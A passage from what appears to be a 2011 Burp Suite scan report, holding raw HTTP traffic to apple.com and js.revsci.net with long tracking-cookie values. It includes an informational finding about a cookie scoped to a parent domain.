Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3Bch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_ppv=apple%2520-%2520index%2Ftab%2520%2528us%2529%2C73%2C73%2C723%2C; s_orientationHeight=723; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%2Ftab%20(us); s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: "2c2c-4a3cac0ba51c0"
If-Modified-Since: Sat, 21 May 2011 15:18:39 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Sat, 21 May 2011 15:18:39 GMT
ETag: "2c2c-4a3cac0ba51c0"
Cache-Control: max-age=448
Expires: Thu, 21 Jul 2011 20:39:14 GMT
Date: Thu, 21 Jul 2011 20:31:46 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=hrJbDtK5cMIRno7qhpE27Uu8DdtJxsnjXm6qSTj0aeUpzjcd0I4+2FnuAC3d+JIEEwDOyuElw0Tb3opnq6s7DreK1BQw3AkzbmR8Qg1QmuzQ+QGrSnxCuBNqLHd9fu2NoeREB7TbnSGOVdqon/CLrNTjM+IAa3ydfX1+u1UELIu/NrbOb4kBQSWI1fNACLohTJm0Z7bBQ6YAzBJraqCdSpYRTpT61itcBJu8hXz3PQ3pYJZUmCrCM/LKy6LXuhYZOMIiwqmhZALswFrWZ6in2+R4iyLQui/A/TwDpkQDKUrzGuYQOKbdyqHjNJDO8SmpFUYuLLYENWumc7z7gYTMv+4wmAUPyNoirTmMfGyQqcQB9iu7hswCR/G358qFt+YUobsbBDGAPnNSRVVVpwhhJmDbpEYN+sfAazLu5XruZal0/bythYQNNxboD4BMBrT0b0UMChIdnid3tqMFew05CAF/LWhV+tYtBLjZitV0tXsWQR5e+FQR9Rwnyebu439gCtwjTW/bflMCQ82OTi6cAPfztz1Z3nFoUEF0Ym3Ng/QJGy/omhL5iK/vMBuGapsQ; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.118. http://js.revsci.net/gateway/gw.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

udm_0=MLv3NyMJZgprXtsfwM3R13ELUehQKLWqEeq2jcz3bMW2EVsJYC1CZ2+KufzdtNqTUsG61ynJgNGyDJUicH3u/6ljL39LDRj/OkdDI8RQ+vEeJTeb16lFNOrVt5urjQKwEC1SnZtOgKyergmUb1M45HYA78FqX6kI/SSuxNe8cK8rOVxL7GUsDLJQQxVJ61ucx5N8kZ7yrrMY9iMiwKUurZXsTekGG1pAyPzKkjGr9Gz+FLZve5SRGk+7Ao6LwY8+ncBw1EPbKy5StP1u6WoiUrlATwV9pU3L1IQgYez9T2WCUeFZzOxUTn+2uxsf5QG2wWCVI+a/JbER7jhwsgi7SMWl3VgRo4RG/5dtFrYUmvx79jJjD/w8pKmn6U0SrxZ8+/SASGLmfMFcVJYqLZRlAvX766EI+xMdKMfzQcTvT0jWfK+c+Af/jCcLVgisOGx6mhCAhpWBsqoNp+73eW/3jjEYc7NTm3/tzGTD7qa4JdcviAz6Ee/li873EJi0sfvagTpNmJ9vUKaIZ4Ru1l0qWolq9WAf90Zd/tgKm+mfoKoGCPRbl52Hu2ctJHpZ7M54K6DdzC/WoO9oiDNC2qzIizs8ZH7iIPUlp9Ym/AFnwgjGBXyJsUQ1IXA2hOqmzjwEBRxbzH3xN/HxYabMVhoa4LLYMShXPOkSSMuNsWzEe1dMZ+69z3YN/6ya++WcdBW+7Y80eA7NpXSg+RsfUuM3Res+qHQzQrvs0uYPUc9oxK0nZqUfYCpXNhy++JAoeY65zxBdJctZMl7YNo1/opy1Ist4JXlu5zqHcc4/II37RsDGyOHIKs9kj5V/duTnLLUt2tYAF+ESGJuEGU5zbdo0DdXKGGXDIKvfiAWYGhpRV59vTdqoBvqv0KGnMw/Vf8ibIdjpYIck1cl+Dnok7yzclasssHnMgS1VFq72m72T1cXsZDOtJa1D9aFfLWm1j7JGdoeIIumIBSOP3FE8ForcZs/dqtIwwH6rlSb7XR/oRNEUE3yZEU5g8LDVBXtTQecbSTMZyNbHifc1dsuVH+NxSUOA8ScEThuEXYJeylt+jOhqEOVKTArJMbOkUEO6Y9k3KufLSADtjGx5/QuieaRdKXjZGUsuUT82VssmqXw/d/xO11UQvzYj1puc9n28ao2QSKyb60f0Kn0QeHbvxP2vLzX3juZZ6Bbzmtg/GFKBNv06HGA8rSr17pVh7/z8WINsdOLvWLPUH8Hgybk1cnw5v044Zu78fasOJrwfeezV+U2jACL6Uim30EtGIxi2XgvFnOaMdrk5SzHLJ0SWYgwUcmXSWStKqbgFxCQJ54ZVOw3vbjcYeaTsKNd3tnQe9PCexkabFDgwzKkf8T51usFPtjmrPqPU8I+0nocyEf4EqOnOa/ZHcu/SYRp5KwKsejooQA8qvQ6MtXYvQwhvdOoWFRknUOq86bo5PgroDMDW5iaxQeIZ1kUeKoj91JMKiZIBQMjIY2A1EYBO00CUJl/A50fAaxLyQehUCBQZaYSZybq5sNDMowJjAJ1Pj4XtML3UJsL2ulLZ835wOONrP8FRpM5P+bxZAq5D/5PqkqzG8ZiJuciJeZij9+n3R6scTzElicbAlK+WUoDJPpLvQHM2IZPKNTKqeyk83wblel/QculOCoV2rwDl+OXsTAX7exCQOsskScP4B2lPYGMyNTs3OX5g3wII/O3qF0XSmGfECzd+FrxEBiB+Q2PB1nzo4LJzXhwHKvkIgnEnh4hdIQyl8PAVpRTybX7JAshdBwKaDDEb4sUVtdjwGVHVIgqcddax+1w=; Domain=.revsci.net; Expires=Sun, 22-Jul-2012 04:30:59 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=G07608 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904233404576462461660747244.html?mod=WSJ_hp_LEFTWhatsNewsCollection
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J08781=82f4957c1a652091&J08781&0&4e3abd4a&0&&4e153a78&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e4a9497&1&10165&4e23b001&1f1a384c105a2f365a2b2d6af5f27c36; rtc_Ua1q=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; rsiPus_txcj="MLsXtTENJApvJ5G2CtKgxPEJrF4+5C1lsBnrgEjvGi+eSZMchfnrP39kON1J8Dw2ez7PupwpYPP5yKMjmbdmh81UPDhyhpxyS7MO2AwR+rZMYnGA4GC9O9QvN1US1tLIl+LPn43PjJ7qQS/pGvY4QhuHwB8K95+qPEnYJnhaG4+IlaKd2qXTFD5NPxzH14rtpxNxhK/Qq6XR1GVuuD0MACeK9YttnZMRVKNyz145LDIp6sgKiL4Tv8VDrtPM20t4ks65WY2j91xoadjPpjUc7aRhCibeE9+Q0gW1g+GMarobzm3uSc9hihqHb2OuTNZp6HvcfpcSolGNaBNFn6mz9S4GdSRXyLKhtThdQvqgzDnGfGijXgpw4hpzJ+XSnKhaapQctKTTGePlLpcjX6DJ0AbryUPeOOvMt1vqCrWGGbdBnJPWRbmfpSBp+b4N/yIvO8wsWNsUJfELOwJAhvSkB6UA0wJyhIbDEgmaojrzG2g4qtKugltluN2yUYG6vo5rVBvqVcdeOkOkKCZ55Jpdoa/Ha3n0gD14Lny/vNlttrvJLIOJyQuk+fVFtklYOCKaHODtYdsy6UCkT1YKa2maAXdUxNfwJEP6X+bmUSljkLBrbBqPr2B/mk8xFnC4OuI21eh19jz9NrrOuYdaelXVAFfsVYl1N5RHr4poGi0gbBQ3IXaDUUmdxbkCMQjwFsM9XRo+GqH6DuFZyinGxc1pmKcjHZyEZAzw7emay24dMXff2kFeAIfeWnJVoykCyOShHGv6o9h7zZATWIiMyYHQGAnfWEjK9lqylOGKcFHzI1vIEluQgEUI6oDFaLn09Yd8x5HU4LR9I5pAso5hjheZzNKx9GihZwttVIKhHi+7RUxzyQi5WprC/6ARua3XbXuEnwW38MgmC1FcFf2OLrmBTx0NgCfVJ37CxnAT0fGeKaqG9PD6njWPiMNQLpbp1MeSeEIc2ooFnljQQIjq4cujHdr+masfVHuefX0AyFNi/9G8eqNYD/MbSh+5TYW7YTujwPvcm9aBPkFiSjNIveSmBaLoO7RN5jAO/tNDQDdP9QxJWrR4GR76w4sTNRGscEB4YhZiyUTfMuLGuFDDO3LxISk1Vc15oBSA20Uu/imPI820TKoKDPFXxBZPuS2W7/TagpYZOhHUlE1Jhh4hDGMH3+k3OUVHfxA8EFcwLOXecXXGXdkj7OM2CoEWN+1UGLnlNH7DOc6Q8N46vAfkGRXYuoYP29k5ad+fsqXZhbC8LPInaUOdVqv3WPMYA0GEjG8Dc/ycsOJ9YDVJiMpf5jiFRC5gqfpBHEExyKw/xQQF37oOrYfVFI8EMhDDyTZxMnM+QdZo2EL4ThE3vVQz6r6KEbMOAGcFNkhxJO1XNzL4WKOWGHo/kAIaQwPLJlofJFvV34UOEyDjoQodhdauy073JrFFp5liMGyUFlDu9DpafuqmexP1pihpMrhBicoTgU/7oSB3SEeXMCqbty3JnBi96+CSk8KsIK5Axz+lIxx5JsH17oVJwi6n1lmSvUdbQ6V5i4NYrwOD76lwBXRBoTMg4X14dFF1dnGGRQd/hgg2B99u3e1qIw=="; rsi_us_1000000="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"; rsi_segs_1000000=pUPF4kmhOQIQDzaRO+F29+DOqKU4kKdJ4yGdFhPolQMcsrefHXHN9uNg2v9sDss6IiP5italYhLuIFOkIfRVw0aOncY8feS+CC1xwsSgYnGMU8L3kcFgA6G017VVo+JvnSUxYMhqZdJhxzk7HAHyBi34+TxlpcAe0rE3MxkAI1GcJF/s6mk1RD72qZSKegvFKM6D1nFbXgAxHixzV4pVy15eibKHGM1xk8+/6LztD32W9BINSTKBLPLfdm/b1IPw7fz6tZVs9cYOasclh2Mo4iuKTX8RZlc4+2FHjj0CYtJrwjr4rhiSIazbgoHGFM/MPs+ny13jNbrI+T5o38VuIheq7h/leislJPuMZzq4x4gT0Tm7RBpnHgD3e3jfhrjqgOlhF2P3xlruoLW6NOdvlw5hozJ9RGZFBksQDgqv/Uok9KnGCKQSya+Q3wbJAWkhqiEHVdQyV3j4EymdVnkWb8Oa6dAzGIhHKWZMv/UChYFM4ipNmS+T+cGrdUbKUBn/l1CZS8i2UHzhw0v81xf0b5QS8sJBcYQ+h0Sdk2vivPj9Rj9O/2M6ho+xwHG+3V5SHuhxTEVQ1IQZnbupNNtdSu5Io2d0o6y1OpflfCY8UtG0McSLWcyuicYcSnFkR1KRMi47nC1FIcAk9jYJSR32MtJaBHEkX2fsYLkMwu8BxAvv6/J1eSbB549C2/UYasDTG+Oaj5oQys86syOzSQ/sjUDIbK/9w9zBqbStUPgCsOcYX1q8b1pUqrqwo2O0J2jdoGvMs9+We52GhNHDPM87BLT9P1sVFiDvBQ==; udm_0=MLv3NyEJZgpn34zE8FbQX8DEVknsM8NIw7Gjhe8Pm2S6tVxuOjTe4yOClBCUhAXKjb6J19qrC1jYeXBvc6uhEMx0wqBR+xj/+vRJI8RQ+vEeJTaNOjMo/nvLxqH4vJlo2cUOiJislM4Xjp+eXfCMJfpgMCAV6+SFFwEIfItU0lXJCgE7vjmgDggc/nxfSh+sro6PEZUWjguxHXbwQj+BKpUym8BujKsEHgUu8xy6OavwcDRlePjfoNG4xQjbgaXUpT6R1He+WuRN9XxzK1UiBaQJkuCqF6JARZ3+HHLlB3GpZF15KEoD0qNOthtBPTpDfRFO4hm10D+0PP0O87XactUPR5TLJ2a04vyvGKf8GngPESlGsOhKE+yi3jfljY2gj03WeTPUket5ITI0SZE0OyiuSbh+C5R2VZcUXFwznc7HUq/5LP84iAxc++RSRuqA0daJyhzu9r8QhKNNIh5yoLEtMrqiVqjZcmtPKcmM1Ac9WvDcsq9s1uo4McbGPHpaGYqxhJS/nEvv6CbG8PiRuesiLm5fnnoUmRmVt6VAka4WurEdc5Ss/LM6MV87SvuLPz43p6JlroKnWhYZ86ntXl1L63XY5U3VwnfdRIQHSe8OIJt6WCezFjcyYR+R8KbCWBiPHVTdL/EFM6NgJaBTVssphljayeEJLOv0fGu6QDrbP9lCLrDLSwcew4ip4U10GBdZQeB57rnuTu7dGlBAmdhOe038ashu/yuGZr6Ow+mcZ41emakxD0vtUjOk7PmOe6Gs35oAZX3aiL4Etv4QLyzjwehmxxrjOI5Ch4e2hSvD5axIG1HnJ0YztcwWN3ejt74I+J0i45Sq2eAsi0Ki0UvjPLrK/WhteJbPVsuQ8lwpD1heGlOmcSIrxr3EiAkxNcD1Dn+26UtBV3wvds0n1NpqTx3yp38oxa9r6ZPxtHUftECetdMl2Onw/za7b87X3QtwkZgb3gjKLfs/qnwtfk8A/gXEeBc/mBNec+uLvAZoZgTyBl96MPLajb+r3wwTxNNDUytsc07MKSqZi1Xu3ddkR0MHI75U/xuoESLY1Yqs200dwdI2dTSwQ/NaWHk2orfUv4bKpflgqdHHmW/n8jiDiSWp2RBeTcMPGoaJfgxctexQ+yATFhZe+qq39gyDLLuBY4t7EZN6bTyFhec70ARJuvevwxmx9AKzkYX0gWey30Ju7BSRWN1elqoHV3yPsPOpentHNa3HKwIrCep8PPT4AkE0rge/90UyjPj/5cMehmrZlwiSFQmue3IaVsN6lnHHUWd4xAIicK36BNgkmv29PDge7CsiBe/luRITMrAoYufrRYRF9GN9JelfXeYEcbiGUraqtwXi7/uU6buWBNDsPqz7uBf21CiUUkKJ8m4WsWx7PXoNaNsSjp59FAINfL+uAnX/ZkXQuPvcpb7p7feRFaWsgQBo6Fs8kPgyVCN4pOnG8SUgKK1DxqGpJAoqCsI0L9/AUwygX9sVOxT49FSRagWXwFGUjR3sZPbbFUanWEDMBSamQqcNAtyaA6XwMPjTerIOJF7SaSuoQyyP0dePFfrflKTeyFxq+Be4QcT4AXMxIz3W6GFTMuurl/NHNR8Tf7WumLEw0/9dwhTU8xyGYVoEroZusoLlKkWURmkU/MU5GFRjJc2QfDEMcaajrC3ah0I2N4mPQIqLwqGqWPobCWVuJ9kmnEfcOeWmsitv3qQ50qytONbhS0psleUPk/XvEGVgalODw3yQAIYWP3tokC9+eKa95Y/mNeVw9jve5HIsb05WkVjdwrbumf+/bEeSDyC58dQ3RJpwVtO7Gg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv3NyMJZgprXtsfwM3R13ELUehQKLWqEeq2jcz3bMW2EVsJYC1CZ2+KufzdtNqTUsG61ynJgNGyDJUicH3u/6ljL39LDRj/OkdDI8RQ+vEeJTeb16lFNOrVt5urjQKwEC1SnZtOgKyergmUb1M45HYA78FqX6kI/SSuxNe8cK8rOVxL7GUsDLJQQxVJ61ucx5N8kZ7yrrMY9iMiwKUurZXsTekGG1pAyPzKkjGr9Gz+FLZve5SRGk+7Ao6LwY8+ncBw1EPbKy5StP1u6WoiUrlATwV9pU3L1IQgYez9T2WCUeFZzOxUTn+2uxsf5QG2wWCVI+a/JbER7jhwsgi7SMWl3VgRo4RG/5dtFrYUmvx79jJjD/w8pKmn6U0SrxZ8+/SASGLmfMFcVJYqLZRlAvX766EI+xMdKMfzQcTvT0jWfK+c+Af/jCcLVgisOGx6mhCAhpWBsqoNp+73eW/3jjEYc7NTm3/tzGTD7qa4JdcviAz6Ee/li873EJi0sfvagTpNmJ9vUKaIZ4Ru1l0qWolq9WAf90Zd/tgKm+mfoKoGCPRbl52Hu2ctJHpZ7M54K6DdzC/WoO9oiDNC2qzIizs8ZH7iIPUlp9Ym/AFnwgjGBXyJsUQ1IXA2hOqmzjwEBRxbzH3xN/HxYabMVhoa4LLYMShXPOkSSMuNsWzEe1dMZ+69z3YN/6ya++WcdBW+7Y80eA7NpXSg+RsfUuM3Res+qHQzQrvs0uYPUc9oxK0nZqUfYCpXNhy++JAoeY65zxBdJctZMl7YNo1/opy1Ist4JXlu5zqHcc4/II37RsDGyOHIKs9kj5V/duTnLLUt2tYAF+ESGJuEGU5zbdo0DdXKGGXDIKvfiAWYGhpRV59vTdqoBvqv0KGnMw/Vf8ibIdjpYIck1cl+Dnok7yzclasssHnMgS1VFq72m72T1cXsZDOtJa1D9aFfLWm1j7JGdoeIIumIBSOP3FE8ForcZs/dqtIwwH6rlSb7XR/oRNEUE3yZEU5g8LDVBXtTQecbSTMZyNbHifc1dsuVH+NxSUOA8ScEThuEXYJeylt+jOhqEOVKTArJMbOkUEO6Y9k3KufLSADtjGx5/QuieaRdKXjZGUsuUT82VssmqXw/d/xO11UQvzYj1puc9n28ao2QSKyb60f0Kn0QeHbvxP2vLzX3juZZ6Bbzmtg/GFKBNv06HGA8rSr17pVh7/z8WINsdOLvWLPUH8Hgybk1cnw5v044Zu78fasOJrwfeezV+U2jACL6Uim30EtGIxi2XgvFnOaMdrk5SzHLJ0SWYgwUcmXSWStKqbgFxCQJ54ZVOw3vbjcYeaTsKNd3tnQe9PCexkabFDgwzKkf8T51usFPtjmrPqPU8I+0nocyEf4EqOnOa/ZHcu/SYRp5KwKsejooQA8qvQ6MtXYvQwhvdOoWFRknUOq86bo5PgroDMDW5iaxQeIZ1kUeKoj91JMKiZIBQMjIY2A1EYBO00CUJl/A50fAaxLyQehUCBQZaYSZybq5sNDMowJjAJ1Pj4XtML3UJsL2ulLZ835wOONrP8FRpM5P+bxZAq5D/5PqkqzG8ZiJuciJeZij9+n3R6scTzElicbAlK+WUoDJPpLvQHM2IZPKNTKqeyk83wblel/QculOCoV2rwDl+OXsTAX7exCQOsskScP4B2lPYGMyNTs3OX5g3wII/O3qF0XSmGfECzd+FrxEBiB+Q2PB1nzo4LJzXhwHKvkIgnEnh4